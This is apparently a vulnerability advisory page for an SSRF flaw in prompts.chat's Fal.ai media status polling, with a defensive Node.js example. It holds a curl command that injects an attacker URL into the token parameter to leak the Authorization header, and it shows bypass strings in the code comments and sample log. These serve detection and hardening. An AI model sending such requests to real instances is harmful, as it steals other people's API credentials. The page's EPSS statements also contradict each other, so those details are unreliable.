Platform
nodejs
Component
prompts-chat
Fixed in
30a8f0470e0ba45e6be9c9f55220f4a9a6b91c99
CVE-2026-22664 describes a server-side request forgery (SSRF) vulnerability discovered in prompts.chat, specifically within the Fal.ai media status polling functionality. This flaw allows authenticated users to initiate arbitrary outbound requests by manipulating the token parameter, bypassing URL validation controls. Affected versions include those prior to commit 30a8f0470e0ba45e6be9c9f55220f4a9a6b91c99, and a fix is available in version 30a8f0470e0ba45e6be9c9f55220f4a9a6b91c99.
The SSRF vulnerability in prompts.chat poses a significant risk because it enables attackers to disclose sensitive credentials. By crafting malicious URLs within the token parameter, an attacker can trick the application into making outbound requests to arbitrary destinations. Crucially, this can lead to the exposure of the FALAPIKEY, which is included in the Authorization header of these requests. With possession of this API key, an attacker could impersonate the victim user, access and manipulate data within the Fal.ai account, probe the internal network for further vulnerabilities, and potentially launch further attacks leveraging the compromised account. The blast radius extends beyond the immediate application to encompass the entire Fal.ai ecosystem and any internal resources accessible through the victim's account.
CVE-2026-22664 was publicly disclosed on April 3, 2026. There is currently no indication of active exploitation campaigns targeting this vulnerability. The EPSS score is pending evaluation. Public proof-of-concept code is not yet available, but the vulnerability's nature and the potential for credential theft make it a likely target for exploitation. Monitor security advisories and threat intelligence feeds for any updates.
Organizations utilizing prompts.chat for internal communication or AI-powered chatbot applications are at risk. Specifically, deployments that rely on Fal.ai for media processing or storage are particularly vulnerable. Shared hosting environments where multiple users share the same prompts.chat instance should be carefully assessed, as a compromised account could impact other users.
• nodejs / server: Monitor application logs for outbound requests to unusual or unexpected domains. Use lsof or netstat to identify processes making outbound connections to suspicious IP addresses or ports.
lsof -i | grep prompts.chat
• generic web: Use curl to test the media status polling endpoint with a crafted URL containing a known malicious domain. Examine the response headers for any signs of credential leakage.
curl -v 'https://your-prompts-chat-instance/api/media_status?token=https://attacker.com' 2>&1 | grep Authorization
Exploit status
EPSS
0.03% (9th percentile)
CISA SSVC
CVSS vector
The primary mitigation for CVE-2026-22664 is to immediately upgrade prompts.chat to version 30a8f0470e0ba45e6be9c9f55220f4a9a6b91c99 or later, which contains the fix for the SSRF vulnerability. If upgrading is not immediately feasible, consider implementing a Web Application Firewall (WAF) or reverse proxy to filter outbound requests and block those containing suspicious URLs. Specifically, configure the WAF to block requests with attacker-controlled URLs in the token parameter. Additionally, review and restrict network access for the Fal.ai application to minimize the potential impact of a successful exploitation. After upgrading, confirm the fix by attempting to trigger the media status polling with a crafted URL and verifying that the FALAPIKEY is not exposed in the outbound request.
Update prompts.chat to the version that includes commit 30a8f0470e0ba45e6be9c9f55220f4a9a6b91c99. This fix validates the URLs supplied in the token parameter during Fal.ai media status polling, mitigating the SSRF vulnerability.
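The advisory says the fix validates the URL carried in the token parameter before the server polls it, and the detection section above suggests watching outbound requests that carry credentials. The following Node.js example is added here for illustration and is not prompts.chat's code, nor the actual pre-fix check or bypass. It shows a weak substring-style check of the kind that commonly lets SSRF through, beside an allowlist-based parser that rejects everything but an exact expected upstream host over https, and a small scanner that flags credentialed outbound requests to non-allowlisted hosts in a log. The allowed host names, the log line format and the sample log lines are all assumptions constructed for the example.

```javascript
// Added example, not prompts.chat code. Demonstrates (1) strict validation of a
// user-supplied upstream URL and (2) detection of credentialed outbound requests
// to unexpected hosts. ASSUMPTION: the allowlisted hosts below are invented.
const ALLOWED_HOSTS = new Set(["queue.fal.run", "fal.run"]);

// Weak check of a commonly seen shape (constructed illustration, not the project's
// real pre-fix logic): prefix/substring tests on the raw string are bypassable,
// e.g. "https://attacker.example/?u=fal.run" or "https://fal.run@attacker.example/".
function weakIsAllowed(token) {
  return typeof token === "string" &&
    token.startsWith("https://") &&
    token.includes("fal.run");
}

// Hardened check: parse with the WHATWG URL parser, then compare the exact
// hostname against an allowlist. Returns the parsed URL, or null to reject.
function parseAllowedUpstreamUrl(token) {
  let url;
  try {
    url = new URL(String(token));
  } catch {
    return null;                                   // not a URL at all
  }
  if (url.protocol !== "https:") return null;      // no http:, file:, gopher:, ...
  if (url.username || url.password) return null;   // rejects https://fal.run@attacker.example/
  if (url.port && url.port !== "443") return null; // no alternate ports toward internal services
  if (!ALLOWED_HOSTS.has(url.hostname)) return null; // exact match: no suffix/substring tricks
  return url;
}

// Detection over an outbound-request log. The line format is CONSTRUCTED for this
// example: "<timestamp> outbound url=<url> auth=<yes|no>", where auth=yes means an
// Authorization header was attached. Flags credentialed requests to hosts that the
// validator above would not have allowed.
const LINE_RE = /^(\S+) outbound url=(\S+) auth=(yes|no)$/;

function findSuspiciousOutbound(logText) {
  const hits = [];
  for (const raw of logText.split("\n")) {
    const m = LINE_RE.exec(raw.trim());
    if (!m) continue;                              // skip lines that are not outbound records
    const [, ts, url, auth] = m;
    if (auth === "yes" && parseAllowedUpstreamUrl(url) === null) {
      let host = "(unparseable)";
      try { host = new URL(url).hostname; } catch {}
      hits.push({ ts, url, host });
    }
  }
  return hits;
}

// Constructed sample log: one legitimate poll, two credentialed requests to a
// non-allowlisted host (both pass the weak check), one uncredentialed fetch.
const SAMPLE_LOG = [
  "2026-04-03T10:00:01Z outbound url=https://queue.fal.run/requests/abc123/status auth=yes",
  "2026-04-03T10:00:02Z outbound url=https://attacker.example/?u=fal.run auth=yes",
  "2026-04-03T10:00:03Z outbound url=https://fal.run@attacker.example/status auth=yes",
  "2026-04-03T10:00:04Z outbound url=https://cdn.example/image.png auth=no",
].join("\n");

// Stand-alone demonstration.
for (const hit of findSuspiciousOutbound(SAMPLE_LOG)) {
  console.log(`${hit.ts} credentialed request to non-allowlisted host ${hit.host}: ${hit.url}`);
}
```

Both flagged lines pass weakIsAllowed, which is the point: a substring or prefix test never establishes which host a request will actually reach. Comparing the parsed hostname against a fixed set, and refusing userinfo and non-default ports, leaves nothing for the caller to steer.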
CVE-2026-22664 is a server-side request forgery vulnerability in prompts.chat that allows attackers to disclose sensitive API keys by manipulating URLs.
You are affected if you are using prompts.chat versions prior to 30a8f0470e0ba45e6be9c9f55220f4a9a6b91c99.
Upgrade to version 30a8f0470e0ba45e6be9c9f55220f4a9a6b91c99 or later. Implement WAF rules to block suspicious outbound requests.
There is currently no confirmed active exploitation, but the vulnerability's potential for credential theft makes it a likely target.
Refer to the prompts.chat release notes and security advisories on their official website or GitHub repository.